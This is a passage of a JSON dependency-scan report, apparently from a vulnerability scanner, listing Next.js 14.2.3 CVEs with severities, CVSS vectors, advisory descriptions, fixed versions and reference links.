no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-56332", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9", "https://nvd.nist.gov/vuln/detail/CVE-2024-56332", "https://www.cve.org/CVERecord?id=CVE-2024-56332" ], "PublishedDate": "2025-01-03T21:15:13.55Z", "LastModifiedDate": "2025-09-10T15:48:41.83Z" }, { "VulnerabilityID": "CVE-2025-55173", "VendorIDs": [ "GHSA-xv57-4mr9-wg8v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-55173", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:424c7e867f0d73a8025fe3bd44b5388ed9557aa94630c835814ae584e16e9146", "Title": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-20" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 } }, "References": [ "http://vercel.com/changelog/cve-2025-55173", "https://access.redhat.com/security/cve/CVE-2025-55173", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v", "https://nvd.nist.gov/vuln/detail/CVE-2025-55173", "https://vercel.com/changelog/cve-2025-55173", "https://www.cve.org/CVERecord?id=CVE-2025-55173" ], "PublishedDate": "2025-08-29T22:15:31.75Z", "LastModifiedDate": "2025-09-08T16:42:57.183Z" }, { "VulnerabilityID": "CVE-2025-57752", "VendorIDs": [ "GHSA-g5qg-72qw-gw5v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57752", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:537de6825cd5bc0c3f8ec3a0acefcd31e5dac41e1a48668272c0f98b6d5ae61f", "Title": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", "Severity": "MEDIUM", "CweIDs": [ "CWE-524" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-57752", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/pull/82114", "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v", "https://nvd.nist.gov/vuln/detail/CVE-2025-57752", "https://vercel.com/changelog/cve-2025-57752", "https://www.cve.org/CVERecord?id=CVE-2025-57752" ], "PublishedDate": "2025-08-29T22:15:31.963Z", "LastModifiedDate": "2025-09-08T16:43:50.33Z" }, { "VulnerabilityID": "CVE-2025-57822", "VendorIDs": [ "GHSA-4342-x723-ch2f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.32, 15.4.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57822", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0bf1ef443f6d7ad178104857d38ac8ab33b7644503dfac91d2ef288442eef7f3", "Title": "Next.js Improper Middleware Redirect Handling Leads to SSRF", "Description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", "Severity": "MEDIUM", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8", "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f", "https://nvd.nist.gov/vuln/detail/CVE-2025-57822", "https://vercel.com/changelog/cve-2025-57822" ], "PublishedDate": "2025-08-29T22:15:32.143Z", "LastModifiedDate": "2025-09-08T16:41:41.253Z" }, { "VulnerabilityID": "CVE-2025-59471", "VendorIDs": [ "GHSA-9g9p-9gw9-jx7f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.10, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-59471", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:98075f5905b28534b30d263d1bd9251f61b142f8240a18664a126db643c45584", "Title": "next: NextJS Denial of Service in Image Optimizer", "Description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-59471", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c", "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec", "https://github.com/vercel/next.js/releases/tag/v15.5.10", "https://github.com/vercel/next.js/releases/tag/v16.1.5", "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f", "https://nvd.nist.gov/vuln/detail/CVE-2025-59471", "https://www.cve.org/CVERecord?id=CVE-2025-59471" ], "PublishedDate": "2026-01-26T22:15:52.89Z", "LastModifiedDate": "2026-02-13T15:03:20.29Z" }, { "VulnerabilityID": "CVE-2026-27980", "VendorIDs": [ "GHSA-3x4c-7xq6-9pq8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.14", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27980", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0e2376c5c785c6d64f06692100f28bb594f25db5e325428ad230d4f889422cca", "Title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service. This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`, including eviction of least-recently-used entries when the limit is exceeded. Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately possible, periodically clean `.next/cache/images` and/or reduce variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and `images.qualities`).", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", "V40Score": 6.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-27980", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8", "https://nvd.nist.gov/vuln/detail/CVE-2026-27980", "https://www.cve.org/CVERecord?id=CVE-2026-27980" ], "PublishedDate": "2026-03-18T01:16:04.957Z", "LastModifiedDate": "2026-03-18T19:52:54.307Z" }, { "VulnerabilityID": "CVE-2026-29057", "VendorIDs": [ "GHSA-ggv3-7p47-pfv8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29057", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:368d76a5c1677f921d2f0a44f41812ccb34bdedc394c5c589b6973e091c717ab", "Title": "next.js: Next.js: HTTP request smuggling in rewrites", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS` request using `Transfer-Encoding: chunked` could trigger request boundary disagreement between the proxy and backend. This could allow request smuggling through rewritten routes. An attacker could smuggle a second request to unintended backend routes (for example, internal/admin endpoints), bypassing assumptions that only the configured rewrite destination/path is reachable. This does not impact applications hosted on providers that handle rewrites at the CDN level, such as Vercel. The vulnerability originated in an upstream library vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency’s behavior so `content-length: 0` is added only when both `content-length` and `transfer-encoding` are absent, and `transfer-encoding` is no longer removed in that code path. If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy, and/or enforce authentication/authorization on backend routes.", "Severity": "MEDIUM", "CweIDs": [ "CWE-444" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-29057", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6", "https://github.com/vercel/next.js/releases/tag/v15.5.13", "https://github.com/vercel/next.js/releases/tag/v16.1.7", "https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8", "https://nvd.nist.gov/vuln/detail/CVE-2026-29057", "https://www.cve.org/CVERecord?id=CVE-2026-29057" ], "PublishedDate": "2026-03-18T01:16:05.443Z", "LastModifiedDate": "2026-03-18T19:49:19.633Z" }, { "VulnerabilityID": "CVE-2026-44576", "VendorIDs": [ "GHSA-wfc6-r584-vfw7" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44576", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5b504aaf80e72f01f9351dc645eda55adef91776e0fadd8bca700ec4cf6981f7", "Title": "Next.js: Next.js: Cache poisoning vulnerability in React Server Components", "Description": "Next.js is a React framework for building full-stack web applications. From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components can be vulnerable to cache poisoning when shared caches do not correctly partition response variants. Under affected conditions, an attacker can cause an RSC response to be served from the original URL and poison shared cache entries so later visitors receive component payloads instead of the expected HTML. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-436" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", "V3Score": 5.4 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L", "V3Score": 5.4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44576", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7", "https://nvd.nist.gov/vuln/detail/CVE-2026-44576", "https://www.cve.org/CVERecord?id=CVE-2026-44576" ], "PublishedDate": "2026-05-13T17:16:23.04Z", "LastModifiedDate": "2026-05-14T13:44:18.27Z" }, { "VulnerabilityID": "CVE-2026-44577", "VendorIDs": [ "GHSA-h64f-5h5j-jqjh" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44577", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5928c3a09a932d2e3dda6dc4c71c417dddd1d168b2ab60ed99cd27967c510fa3", "Title": "Next.js: Next.js: Denial of Service via Image Optimization API", "Description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44577", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", "https://nvd.nist.gov/vuln/detail/CVE-2026-44577", "https://www.cve.org/CVERecord?id=CVE-2026-44577" ], "PublishedDate": "2026-05-13T17:16:23.173Z", "LastModifiedDate": "2026-05-13T20:00:59.993Z" }, { "VulnerabilityID": "CVE-2026-44580", "VendorIDs": [ "GHSA-gx5p-jg67-6x7h" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44580", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:223968b899125a59b5a52e3d3cb4383e9102010d64fd4d0d2eb5ad68e8a25996", "Title": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", "Description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", "https://nvd.nist.gov/vuln/detail/CVE-2026-44580" ], "PublishedDate": "2026-05-13T18:16:18.26Z", "LastModifiedDate": "2026-05-14T18:33:34.17Z" }, { "VulnerabilityID": "CVE-2026-44581", "VendorIDs": [ "GHSA-ffhc-5mcf-pf4q" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44581", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3dd9a0e34c2e90ba3cefe7a455892cf24c825a44bae466f74e7fa06a21a4ee52", "Title": "next.js: Next.js: Stored Cross-Site Scripting via malformed nonce values in cached responses", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 4.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "V3Score": 4.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44581", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", "https://nvd.nist.gov/vuln/detail/CVE-2026-44581", "https://www.cve.org/CVERecord?id=CVE-2026-44581" ], "PublishedDate": "2026-05-13T18:16:18.4Z", "LastModifiedDate": "2026-05-14T18:30:24.34Z" }, { "VulnerabilityID": "CVE-2025-32421", "VendorIDs": [ "GHSA-qpjv-v59x-3qc4" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.24, 15.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-32421", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d8ed5232f6f9d49e987d3c7c6195c791fe445cfcb12fd6123e3875a513b77fa8", "Title": "next.js: Next.js Race Condition to Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", "Severity": "LOW", "CweIDs": [ "CWE-362" ], "VendorSeverity": { "ghsa": 1, "redhat": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-32421", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4", "https://nvd.nist.gov/vuln/detail/CVE-2025-32421", "https://vercel.com/changelog/cve-2025-32421", "https://www.cve.org/CVERecord?id=CVE-2025-32421" ], "PublishedDate": "2025-05-14T23:15:47.87Z", "LastModifiedDate": "2025-09-10T15:16:10.053Z" }, { "VulnerabilityID": "CVE-2025-48068", "VendorIDs": [ "GHSA-3h52-269p-cp9r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.2.2, 14.2.30", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48068", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7b9e68b251f17eb83c97fa84c26538563533db665542929669216241072dbb74", "Title": "next.js: Information exposure in Next.js dev server due to lack of origin verification", "Description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", "Severity": "LOW", "CweIDs": [ "CWE-1385" ], "VendorSeverity": { "ghsa": 1, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N", "V40Score": 2.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48068", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r", "https://nvd.nist.gov/vuln/detail/CVE-2025-48068", "https://vercel.com/changelog/cve-2025-48068", "https://www.cve.org/CVERecord?id=CVE-2025-48068" ], "PublishedDate": "2025-05-30T04:15:48.51Z", "LastModifiedDate": "2025-09-10T15:17:38.677Z" }, { "VulnerabilityID": "CVE-2026-44572", "VendorIDs": [ "GHSA-3g8h-86w9-wvmq" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44572", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:3748764db84be8220297895af5974a6f8aa80cc244b6ac6320a4e7c118e565f9", "Title": "next.js: Next.js: Denial of Service due to improper handling of x-nextjs-data header with redirects", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-349" ], "VendorSeverity": { "ghsa": 1, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 3.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-44572", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", 